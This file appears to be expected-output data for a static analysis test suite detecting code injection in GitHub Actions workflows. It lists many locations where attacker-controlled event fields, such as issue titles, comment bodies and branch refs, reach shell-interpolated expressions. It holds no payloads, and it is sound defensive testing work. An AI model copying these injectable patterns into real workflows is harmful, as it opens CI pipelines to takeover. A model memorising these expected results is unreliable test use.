| github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | 